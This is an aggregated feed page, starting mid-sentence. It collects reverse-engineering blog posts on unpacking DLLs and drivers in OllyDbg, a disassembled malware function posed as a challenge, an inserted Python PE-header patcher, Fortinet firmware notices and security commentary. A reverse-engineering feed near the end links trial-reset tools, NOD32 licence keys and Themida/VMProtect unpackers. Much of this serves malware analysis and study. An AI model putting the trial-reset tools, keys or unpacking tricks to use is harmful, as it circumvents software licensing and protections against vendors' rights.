netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse consequence of this is that the DLL may take a few extra milliseconds to load. The patcher is compatible with both 32-bit and 64-bit DLLs.
You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you

==> Counting Lines of Source Code

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I'm reviewing the source code for a rather large project this week and I wanted to update my Facebook status by saying something like, "Jason is reviewing 100,000 lines of Java for security vulnerabilities." However, being the perfectionist that I am, I wanted to give the real number of lines of code. I wasn't aware of any built-in functionality in Visual Studio to do this, and after three minutes of Googling, I found a lot of Visual Studio plugins that could do this but unfortunately I didn't find any instructions on how to do this with just plain Visual Studio. And honestly, I didn't want to install a plugin (see http://blogs.msdn.com/oldnewthing/archive/2006/03/22/558007.aspx :) I figured I could whip up a short C# program to do this, but even that seemed a little overkill for such a simple task. Then I realized I could do this from a standard console window command prompt:
cmd /v:on
set lines = 0
for /r %a in (*.java) do (
find /v /c "" "%a" > %temp%\temp.txt
for /f "tokens=6" %b in (%temp%\temp.txt) do (set /a lines += %b)
)
echo %lines%
The "tokens=6" part is specific to the source code directory structure for this particular project, and if any of the source code subdirectories contained spaces, you'd have to tweak the code above a little. But hey, it worked out quite nicely, and it was a much cleaner solution than installing a plugin. And I'm sure there's an even shorter/simpler way to do this from a standard command prompt than with what I have above. Feel free to post cleaner "solutions" :) (BTW, the actual number of lines turned out to be 348,523... that should keep me busy for a while.)

==> Investigating Outlook's Single-Instance Restriction (PART 2)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Please see PART 1. While the return value of FindWindowA is used to determine whether or not Outlook terminates its process, there's another issue when it comes to using a separate profile. Outlook calls MAPILogonEx without the MAPI_NEW_SESSION bit set. This causes Outlook to try to use an existing MAPI session if it can find one. Because of this, Outlook doesn't present the user with the option to choose a different profile in the second instance of Outlook; it will instead just use the profile that the first instance is using. (Why I didn't hit this issue in PART 1 is not clear.) As such, to fully overcome Outlook's single-instance limitation, it is necessary to spoof the return value of the FindWindowA call in PART 1 and to set the MAPI_NEW_SESSION bit in the flFlags argument passed to MAPILogonEx.

==> Loading Drivers in OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In a previous post, I talked about changing the Subsystem field in the IMAGE_OPTIONAL_HEADER to trick OllyDbg into loading a driver for the purpose of unpacking. However, making this single change is often not enough to be able to load the driver as an EXE in OllyDbg. From my experience (in other words, I haven't verified this in the Windows source code and I'm not speaking authoritatively here), executable files need to have NTDLL.DLL in their Import Table or have another DLL in their Import Table that will eventually cause NTDLL.DLL to get loaded. I was looking at a driver today that only had NTOSKRNL.EXE and HAL.DLL in its Import Table. The former causes BOOTVID.DLL and KDCOM.DLL to get loaded as well; however, nowhere in the import chain does NTDLL.DLL get loaded. Because of this, OllyDbg can't get the driver up and running after we make the Subsystem change. To solve this problem, we can add NTDLL.DLL (or anything that imports NTDLL.DLL, like KERNEL32.DLL) to the Import Table of the driver, and OllyDbg will then be able to load the driver as a new process.

==> Function Analysis

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it's still unclear what the function does. Since you don't have access to the callers of this function, I'll tell you this:
* The first argument is a null-terminated ASCII string.
* The second argument is a null-terminated ASCII string.
* The third argument is an integer.
Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations:
* Cannot refer to the name of a person, place, or time.
* Cannot refer to anything obscene or offensive.
* Cannot be found in a dictionary or web-search.
* Cannot use bleep-casing for compounding words -- must begin with one uppercase letter and end with all lowercase letters.
* Must be a "generic" name (for example, shouldn't contain the word "bot" or "worm", since I have no idea what class of malware I'll end up naming next).
* Must be humanly pronounceable.
* Must be between four and eight letters in length.
* I have final discretion over the name in case you think of something "bad" that isn't covered by one of the rules above.
The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does. And in case you think I'm "hiring cheap labor" to analyze this for me, I'll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I'll post my analysis which hashes to that MD5.
Here's the function:
sub_0 proc near
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_8], 697A259Dh
xor [ebp+var_8], 182Ch
inc dword ptr ds:42C094h
and [ebp+var_C], 0
and [ebp+var_4], 0
jmp short loc_94
; -----------------------------------------------------------------------
loc_2A: ; CODE XREF: sub_0+A6j
xor ebx, ebx
add [ebp+var_8], 3AA5h
inc dword ptr ds:42C094h
xor edi, edi
jmp short loc_81
; -----------------------------------------------------------------------
loc_3D: ; CODE XREF: sub_0+8Fj
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
movsx edx, byte ptr [esi+edi]
cmp eax, edx
jnz short loc_52
inc ebx
loc_52: ; CODE XREF: sub_0+4Fj
mov ecx, esi
or eax, 0FFFFFFFFh
loc_57: ; CODE XREF: sub_0+5Cj
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_57
cmp ebx, eax
jnz short loc_72
inc [ebp+var_C]
mov eax, [ebp+arg_8]
cmp [ebp+var_C], eax
jnz short loc_72
mov eax, [ebp+var_4]
jmp short loc_C0
; -----------------------------------------------------------------------
loc_72: ; CODE XREF: sub_0+60j ; sub_0+6Bj
mov eax, 43C9h
mul [ebp+var_8]
mov [ebp+var_10], eax
mov [ebp+var_8], eax
inc edi
loc_81: ; CODE XREF: sub_0+3Bj
mov ecx, esi
or eax, 0FFFFFFFFh
loc_86: ; CODE XREF: sub_0+8Bj
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_86
cmp edi, eax
jb short loc_3D
inc [ebp+var_4]
loc_94: ; CODE XREF: sub_0+28j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_9C: ; CODE XREF: sub_0+A1j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_9C
cmp [ebp+var_4], eax
jb short loc_2A
mov eax, 0FFFFh
jmp short loc_C0
; -----------------------------------------------------------------------
mov eax, 514Ah
mul dword ptr [ebp-8]
mov [ebp-10h], eax
mov eax, [ebp-10h]
mov [ebp-8], eax
loc_C0: ; CODE XREF: sub_0+70j ; sub_0+ADj
pop edi
pop esi
pop ebx
leave
retn
sub_0 endp
And here's the raw byte-code for the function above:
5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200
8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC
01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3
7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8
4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01
0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8
5F5E5BC9C3

==> Virus Bulletin 2006

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I bought my plane ticket a few hours ago for Virus Bulletin 2006. I'm looking forward to rubbing elbows with other virus analysts and discussing the latest and greatest reverse engineering tools and methods. If you're going to VB'06 as well, send me an e-mail or find me in person and mention my blog and I'll buy you a beer (which shouldn't be too hard seeing as how the conference will be in Montreal)!

==> Unpacking DLLs and Drivers with OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx People often ask me how to unpack DLLs and drivers. A common assumption is that it is necessary to use OllyDbg's LOADDLL for unpacking DLLs and that a ring-0 debugger such as SoftICE or WinDbg is necessary for unpacking drivers. With a little tweaking, we can use regular OllyDbg to unpack packed DLLs and even many packed drivers. I don't know about you, but I've always had problems with LOADDLL. Even though it's well documented in OllyDbg's help file (the source is even included in the help file), I'd rather not use it if I don't have to. So how can we load a DLL into OllyDbg so that we can unpack it like we would a normal EXE? All that you need to do is set the IMAGE_FILE_DLL bit to zero in the Characteristics field of the PE's IMAGE_FILE_HEADER structure. You could use a hex editor to make this change, but it's easier with a PE editor like LordPE. Once this flag is zeroed out, you can load the "DLL" into OllyDbg, and both OllyDbg and the OS will interpret it as an EXE. You can then unpack it as you would an EXE (trace to the OEP, dump, fix the imports, etc.), and then set the IMAGE_FILE_DLL bit back to one in the unpacked file. The only catch is that many unpacking stubs check to see if [EBP+0x0C] == 1 (does the fdwReason argument to DllMain equal DLL_PROCESS_ATTACH), and if it doesn't equal 1 then the stub won't continue to unpack itself. You can fix this problem by looking for this comparison and forcing a jump/no-jump, or by manually pushing three DWORDs onto the stack (before executing the first instruction at the EP), the second of which should be 1. We can use the same PE header patching trick for loading drivers into OllyDbg for unpacking purposes. By setting the Subsystem field to 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI) in the PE's IMAGE_OPTIONAL_HEADER, OllyDbg and the OS will interpret the file as an EXE instead of as a driver.
This allows us to trace through the unpacking stub until the code and data are unpacked, and we can dump the process when we find the OEP. Of course if the unpacking stub is trying to execute instructions/functions that need to be executed from ring-0 then we won't be able to unpack it like this. However, if the unpacking stub is just doing a lot of simple XORing to unpack the original code and data, then we should be able to use this trick to successfully unpack the driver with OllyDbg.
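The three header fields the posts above keep coming back to (the IMAGE_FILE_DLL bit in IMAGE_FILE_HEADER.Characteristics, the Subsystem field of IMAGE_OPTIONAL_HEADER, and the Import and Bound Import data directories that the DLL patcher rewrites and clears) can be read and rewritten with a few dozen lines of pure Python. The script below is an added example for this feed page; it is not the author's patcher or any tool from the posts. It assumes only the standard PE32/PE32+ header layout, and the sample it inspects is a constructed 32-bit header with no sections, built in `build_sample_pe` so the script runs offline on nothing but itself. The helpers `clear_dll_flag`, `set_subsystem` and `clear_bound_imports` are hypothetical names; they apply exactly the edits the posts describe for loading a DLL or driver into OllyDbg as an EXE, and a defender can use `parse_pe` the other way round, to notice a binary whose Characteristics, Subsystem or entry point no longer match what the file claims to be.

```python
"""Minimal PE header inspector and patcher for the fields discussed above.
Pure stdlib; the sample PE at the bottom is constructed, not a real file."""
import struct

IMAGE_FILE_DLL = 0x2000              # Characteristics bit: file is a DLL
IMAGE_SUBSYSTEM_NATIVE = 1           # drivers
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2      # ordinary GUI EXE
DIR_IMPORT, DIR_BOUND_IMPORT = 1, 11  # IMAGE_DIRECTORY_ENTRY_IMPORT / _BOUND_IMPORT


def _offsets(data):
    """Return (coff_header_offset, optional_header_offset, is_pe32plus)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    opt = coff + 20                      # IMAGE_FILE_HEADER is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return coff, opt, magic == 0x20B


def _dirs_offset(opt, pe32plus):
    """Offset of NumberOfRvaAndSizes; the DataDirectory array follows it."""
    return opt + (108 if pe32plus else 92)


def parse_pe(data):
    """Report the header fields that decide how a loader or debugger treats the file."""
    coff, opt, pe32plus = _offsets(data)
    machine, nsections, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    entry = struct.unpack_from("<I", data, opt + 16)[0]       # AddressOfEntryPoint
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]   # same offset for PE32 and PE32+
    ndirs_off = _dirs_offset(opt, pe32plus)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]

    def directory(i):
        if i >= ndirs:
            return (0, 0)
        return struct.unpack_from("<II", data, ndirs_off + 4 + 8 * i)   # (RVA, size)

    return {
        "machine": machine, "sections": nsections, "pe32plus": pe32plus,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "subsystem": subsystem, "entry_point": entry,
        "import_dir": directory(DIR_IMPORT),
        "bound_import_dir": directory(DIR_BOUND_IMPORT),
    }


def clear_dll_flag(data):
    """The DLL-unpacking trick: zero IMAGE_FILE_DLL so the file loads as an EXE."""
    coff, _, _ = _offsets(data)
    out = bytearray(data)
    chars = struct.unpack_from("<H", out, coff + 18)[0]       # Characteristics
    struct.pack_into("<H", out, coff + 18, chars & ~IMAGE_FILE_DLL)
    return bytes(out)


def set_subsystem(data, value):
    """The driver trick: rewrite Subsystem (e.g. NATIVE -> WINDOWS_GUI)."""
    _, opt, _ = _offsets(data)
    out = bytearray(data)
    struct.pack_into("<H", out, opt + 68, value)
    return bytes(out)


def clear_bound_imports(data):
    """What the patcher post does: drop the Bound Import directory (RVA and size = 0)."""
    _, opt, pe32plus = _offsets(data)
    out = bytearray(data)
    struct.pack_into("<II", out, _dirs_offset(opt, pe32plus) + 4 + 8 * DIR_BOUND_IMPORT, 0, 0)
    return bytes(out)


def build_sample_pe(characteristics=0x2102, subsystem=IMAGE_SUBSYSTEM_WINDOWS_GUI, entry=0x1000):
    """Constructed 32-bit PE header (headers only, no sections); values are made up."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, characteristics)  # i386, 1 section
    opt = bytearray(224)                                      # PE32 optional header incl. 16 directories
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 16, entry)                    # AddressOfEntryPoint
    struct.pack_into("<H", opt, 68, subsystem)                # Subsystem
    struct.pack_into("<I", opt, 92, 16)                       # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * DIR_IMPORT, 0x2000, 0x28)        # constructed import dir
    struct.pack_into("<II", opt, 96 + 8 * DIR_BOUND_IMPORT, 0x3000, 0x10)  # constructed bound imports
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    dll = build_sample_pe()                                   # default flags: EXECUTABLE | 32BIT | DLL
    print(parse_pe(dll))
    print("after clear_dll_flag:", parse_pe(clear_dll_flag(dll))["is_dll"])
    drv = build_sample_pe(characteristics=0x0102, subsystem=IMAGE_SUBSYSTEM_NATIVE)
    print("driver subsystem:", parse_pe(set_subsystem(drv, IMAGE_SUBSYSTEM_WINDOWS_GUI))["subsystem"])
```

Run against a real file, `parse_pe(open(path, "rb").read())` gives the same dictionary; the patch helpers only touch the two-byte and eight-byte fields named, so everything else in the image (sections, real imports, the entry point the patcher post redirects) is left untouched and can be diffed before and after.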

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B005 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiAnalyzer 4.3.6

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 4.3.6 B0691 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FLG_100B, FLG_100C, FLG_400B, * FLG_800, FLG_800B, FLG_1000B, * FLG_1000C, FLG_2000, FLG_2000A, * FLG_2000B, FLG_4000, FLG_4000A, * FLG_4000B, FLG_VM32, FLG_400C, * FLG_VM64, FLG_200D

==> FortiCam 1.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiCam 1.0.0 B0116 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCM_200D, FCM_VM-64

==> FortiCache 2.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.2.0 B0221 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC,

==> FortiAnalyzer 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 5.0.1 B0087 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAZ_1000B, FAZ_1000C, FAZ_100C, * FAZ_2000A, FAZ_2000B, FAZ_4000A, * FAZ_4000B, FAZ_400B, FAZ_400C, * FAZ_VM32, FAZ_VM64, FAZ_200D,

==> FortiOS 4.3.11

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.11 B0646 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FWF_60C, * FOC_3950B, FOC_3951B, FGT_3040B, * FGT_621B, FGT_3140B, FGT_5001B, * FGT_60C, FGT_VM32, FK_3810A, * FK_5001A, FK_3950B, FK_3951B, * FSW_5203B, FWF_60CX_A, FWF_60CM, * FGT_300C, FOC_80C, FOC_5001B, * FK_5001B, FGT_VM64, FGT_600C, * FGT_1000C, FGT_40C, FWF_40C, * FGT_20C, FWF_20C, FGT_VM64_XEN, * FGT_100D, FGT_5101C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C, FGT_60C_POE, FGT_20C_ADSL_A, * FWF_20C_ADSL_A

==> FortiManager 4.3.6

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 4.3.6 B0673 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FMG_200D

==> FortiWeb 4.4.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.4 B0669 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiClient Mac 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.0 B0068 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MacOS

==> FortiClient 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.0 B0161 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiAnalyzer 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 5.0.0 B0076 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAZ_1000B, FAZ_1000C, FAZ_100C, * FAZ_2000A, FAZ_2000B, FAZ_4000A, * FAZ_4000B, FAZ_400B, FAZ_400C, * FAZ_VM32, FAZ_VM64, FAZ_200D,

==> FortiOS 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.0 B0128 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_40C, FGT_60C, FGT_80C, * FGT_80CM, FGT_110C, FGT_111C, * FGT_200B, FGT_200B_POE, FGT_300C, * FGT_310B, FGT_311B, FGT_620B, * FGT_620B_DC, FGT_621B, FGT_1240B, * FGT_3016B, FGT_3040B, FGT_3140B, * FGT_3810A, FGT_3950B, FGT_3951B, * FGT_5001A, FGT_5001B, FGT_VM32, * FGT_VM64, FWF_40C, FWF_60C, * FWF_60CM, FWF_60CX_A, FWF_80CM, * FWF_81CM, FGT_310B_DC, FGT_3040B_DC, * FGT_3040B_LENC, FGT_3140B_LENC, FGT_3140B_DC, * FGT_800C, FGT_1000C, FGT_100D, * FGT_5101C, FGT_600C, FSW_5203B, * FWF_20C, FGT_20C, FGT_60C_POE, * FGT_20C_ADSL_A, FWF_20C_ADSL_A

==> FortiManager 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 5.0.0 B0076 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FortiConsole, FMG_1000C, FMG_100C, * FMG_3000B, FMG_3000C, FMG_400B, * FMG_400C, FMG_5001A, FMG_VM32, * FMG_VM64, FMG_200D

==> FortiAP 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.0 B0021 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B

==> FortiExploreriOS 1.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExploreriOS 1.0.0 B0109 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * iOS

==> FortiDB 4.4.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiDB 4.4.2 B0240 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDB_400B, FDB_1000B, FDB_1000C, * FDB_2000B, FDB_Stand-alone, FDB_400C,

==> FortiCache 2.1.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.1.3 B0176 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC,

==> FortiAuthenticator 2.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAuthenticator 2.0.0 B0006 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAC_400C, FAC_1000C, FAC_3000B, * FAC_VM

==> FortiDDoS 3.1.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.1.2 B4 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDD_100A, FDD_200A, FDD_300A,

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B004 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiClient 4.3.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 4.3.5 B472 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x86, Windows_x64

==> FortiMail 4.3.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 4.3.3 B0520 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FE_100, FE_100C, FE_400, * FE_400B, FE_400C, FE_2000, * FE_2000A, FE_2000B, FE_3000C, * FE_3000C_LENC, FE_4000, FE_5001A, * FE_5002B, FE_VM, FE_200D,

==> FortiWeb 4.4.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.3 B0657 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiClient Android 4.1.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Android 4.1.1 B0019 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Android

==> Has HTML5 made us more secure?

http://rdist.root.org/feed/ Brad Hill recently wrote an article claiming that HTML5 has made us more secure, not less. His essential claim is that over the last 10 years, browsers have become more secure. He compares IE6, ActiveX, and Flash in 2002 (when he started in infosec) with HTML5 in order to make this point. While I think [...]

==> Toggl time-tracking service failures

http://rdist.root.org/feed/ A while ago, we investigated using various time-tracking services. Making this quick and easy for employees is helpful in a consulting company. Our experience with one service should serve as a cautionary note for web 2.0 companies that want to sell to businesses. Time tracking is a service that seems both boring and easy to [...]

==> Cyber-weapon authors catch up on blog reading

http://rdist.root.org/feed/ One of the more popular posts on this blog was the one pointing out how Stuxnet was unsophisticated. Its use of traditional malware methods and lack of protection for the payload indicated that the authors were either “Team B” or in a big hurry. The post was intended to counteract the breathless praise in the [...]

==> RSA repeats earlier claims, but louder

http://rdist.root.org/feed/ Sam Curry of RSA was nice enough to respond to my post. Here are a few points that jumped out at me from what he wrote: RSA is in the process of fixing the downgrade attack that allows an attacker to choose PKCS #1 v1.5, even if the key was generated by a user who selected [...]

==> Why RSA is misleading about SecurID vulnerability

http://rdist.root.org/feed/ There’s an extensive rebuttal RSA wrote in response to a paper showing that their SecurID 800 token has a crypto vulnerability. It’s interesting how RSA’s response walks around the research without directly addressing it. A perfectly accurate (but inflammatory) headline could also have been “RSA’s RSA Implementation Contained Security Flaw Known Since 1998“. The research [...]

==> SSL optimization and security talk

http://rdist.root.org/feed/ I gave a talk at Cal Poly on recently proposed changes to SSL. I covered False Start and Snap Start, both designed by Google engineer Adam Langley. Snap Start has been withdrawn, but there are some interesting design tradeoffs in these proposals that merit attention. False Start provides a minor improvement over stock SSL, which [...]

==> OllyDbg 2.00.01 (Final)

http://reversengineering.wordpress.com/feed/ OllyDbg 2.0 is a 32-bit assembler-level analysing debugger with an intuitive interface. It is especially useful if source code is not available or when you experience problems with your compiler. Requirements: developed and tested mainly under Windows 2000 and Windows XP, but should work under any Windows version: 95, 98, ME, NT, 2000, XP, 2003 Server, [...]

==> PROTECTiON iD 6.4.0

http://reversengineering.wordpress.com/feed/ Features: - detection of every major PC ISO game / application protection - currently covers 475 detections, including win32/64 exe protectors & packers, .NET protectors, dongles, licenses & installers - sector scanning of CDs / DVDs for copy protections - files / folders can simply be dragged & dropped into PiD - strong scanning routines allowing [...]

==> StrongOD 0.3.4.639

http://reversengineering.wordpress.com/feed/ Make your OllyDbg strong! This plug-in provides three ways to start the debugged process: 1. Normal: the same as the original start (the STARTUPINFO structure still contains the tell-tale data); 2. CreateAsUser: starts the process as a specified user, so that it runs under the privileges of that user [...]

==> Broken links! (Links that don't work)

http://reversengineering.wordpress.com/feed/ Hi dear friends, tell me about broken links in this post; I will find them on my system and after that I will try [...]

==> Trial Reset 4 Final

http://reversengineering.wordpress.com/feed/ Trial Reset 4 Final. Thanks fly to its programmer. http://rapidshare.com/files/409095074/Trial-Reset40Final.zip http://reversengineering.files.wordpress.com/2010/07/trial-reset40final-zip.jpg You know what to do ;) Filed under: OTHER, TOOLS

==> The newest NOD32 keys with MVGM NOD32 Licence v1.0

http://reversengineering.wordpress.com/feed/ Hi. The newest NOD32 keys with MVGM NOD32 Licence v1.0. NOD32 [...]

==> TrialReset 4.0 Final (Public)

http://reversengineering.wordpress.com/feed/ Hi to all, I am here again. Thank you for your support. A small program for removing the trial limitation of apps. Works with all the widespread protection systems. The interface is very simple: [...]

==> ODDragAttach 1.1

http://reversengineering.wordpress.com/feed/ Author: Exile. Description: when invoked, it adds the window corresponding to the process (src and bin are included). While choosing the process, OllyDbg automatically minimizes its own window; you select the target window, and the OllyDbg window is then maximized again. Note: in some versions of OllyDbg the program may cover an open button; this can be changed according [...]

==> Attach Extended 0.1

http://reversengineering.wordpress.com/feed/ This is a really small plugin that I have written for improving attach feature of OllyDbg. With this plugin, you can attach to process by identifying its PID directly, not only selecting process list. In addition, you can find PID of process by dragging a small cursor on each window (This can be used on [...]

==> Mapimp 0.4

http://reversengineering.wordpress.com/feed/ Author takerZ Description This is an open source OllyDbg plugin which will help you to import map files exported by IDA or Dede. There are many plugins using which you can perform similar actions, but mapimp: - Recognizes debugged file segments and applies names correctly - Has an option to overwrite or skip [...]

==> Obsidium 1.4.x.x OEP Finder + IAT Repair v0.1

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/7203.a79ca10d2342f1b32333add72/Obsidium_1.4.x.x_OEP_Finder___IAT_Repair_v0.1.txt.html Author Pavka Posted in Scripts, TOOLS

==> MUltimate Assembler 1.2

http://reversengineering.wordpress.com/feed/ Author RaMMicHaeL A multi-line (dis)assembler tool, perfect for writing code caves. It supports: - labels and data (C-style string) - external jumps and calls. http://letitbit.net/download/6671.c63ed09074b57c49b4cd2067e/MUltimate_Assembler_v1.2.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> VMProtect 1.7 – 1.8 OEP Finder + Unpack Helper v1.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/2516.25addf1167522eb8602b67146/VMProtect_1.7___1.8_OEP_Finder___Unpack_Helper_v1.0.txt.html by LCF-AT Posted in Scripts, TOOLS

==> CodeDoctor 0.90

http://reversengineering.wordpress.com/feed/ Functions:
1) Deobfuscate
Select instructions in the disasm window and execute this command. It will try to clear the code of junk instructions.
Example:
Original:
    00874372  57              PUSH EDI
    00874373  BF 352AAF6A     MOV EDI,6AAF2A35
    00874378  81E7 0D152A41   AND EDI,412A150D
    0087437E  81F7 01002A40   XOR EDI,402A0001
    00874384  01FB            ADD EBX,EDI
    00874386  5F              POP EDI
Deobfuscated:
    00874372  83C3 04         [...]

==> Themida + WinLicense 1.1.0.0 – 2.1.0.0 Dumper + IAT Repair + CodeEncrypt Repair v2.6.0

http://reversengineering.wordpress.com/feed/ by Quosego http://letitbit.net/download/5120.c5ff8c01bf87b5594de7f4fbc/Themida___WinLicense_1.1.0.0___2.1.0.0_Dumper___IAT_Repair___CodeEncrypt_Repair_v2.6.0.txt.html Posted in Scripts, TOOLS

==> Scripad 1.0 + ODBGScript 1.77.3

http://reversengineering.wordpress.com/feed/ ODbgScript is a plugin for OllyDbg, which is, in our opinion, the best application-mode debugger out there. One of the best features of this debugger is the plugin architecture which allows users to extend its functionality. ODbgScript is a plugin meant to let you automate OllyDbg by writing scripts in an assembly-like language. Many tasks [...]

==> StrongOD 0.2.6.415

